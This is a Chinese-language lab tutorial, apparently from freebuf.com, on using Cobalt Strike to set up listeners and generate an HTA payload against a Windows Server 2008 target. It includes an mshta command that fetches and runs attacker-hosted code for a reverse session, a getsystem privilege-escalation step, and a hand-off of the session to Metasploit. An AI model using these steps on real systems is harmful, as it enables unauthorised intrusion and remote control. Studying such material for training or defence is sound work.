Cobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。功能挺多,文章只是讲了工具的核心功能
渗透机:kali,靶机:ws08。
kali:172.16.1.34
ws08:172.16.1.24
agscript 拓展应用的脚本
clint 检查profile的错误信息
teamserver 服务端程序
cobaltstrike 客户端程序
cobaltstrike.jar(java跨平台)客户端
logs 目录记录与目标主机的信息
third-party 第三方工具
启动服务器
执行./teamserver 172.16.1.34 p@ssw0rd
不要关闭窗口,然后本机启动cobalt strike连接测试客户端连接
枚举用户
用户通信
/msg Ro0t xxxxxx
上面是启动和操作方法,下面看下cobaltstrike监听模块
Beacon为cs内置监听器,需要在目标机上执行相应的payload,获取shell到cs中。包含了smb,DNS, HTTP等模块
=============================================================
windows/beacon_http/reverse_dns_txt
windows/beacon_http/reverse_http x86/x64
模块有很多,这里不列举了
foreigh为与外部相结合的监听器,主要用于msf结合,比如获取meterpreter到shell中
=============================================================
在cobalt strike中添加一个Listener,创建beacon Listener
创建Foreign Listener
save,在主配置菜单中依次点击,Attack,packages,HTML Application
选择Listener生成与方法,有powershell,vba以及exe三种可执行文件
选择ps,保存到桌面上、
依次点击Attacks,webdirve-by,hostfile、通过web服务打开连接通道
然后再弹出的窗口中找到文件一栏,点击文件夹按钮,找到需要添加的恶意脚本.hta、添加完后点击launch启动web服务模块
此时我们查看日志信息提示我们在靶机客户端访问连链接
回到靶机,打开终端使用命令mshta.exe http://172.16.1.34:80/download/file.txt命令
kali查看,新连接已经建立起来了
默认情况下此处链接有60s的心跳线,为避免流量过大可以适当调整间隔。
右击会话选择interact打开交互会话终端
可以查看下当前权限,可以使用getsystem提权试试。
打开一个新的终端,进入msf设置一个监听载荷,lhost设置成本地ip,然后expliit -j
回到cobalt里,右击spawn生成新的listener。然后在弹出的窗口中点击add添加一个新监听器
此时监听设置完,然后进入msf终端来传递cobaltstrike的shell
回到msf可以发现已经和靶机建立起了会话
结束
注:实验是在实训平台进行的
来源:freebuf.com 2020-05-17 14:22:00 by: kGJoylcy
请登录后发表评论
注册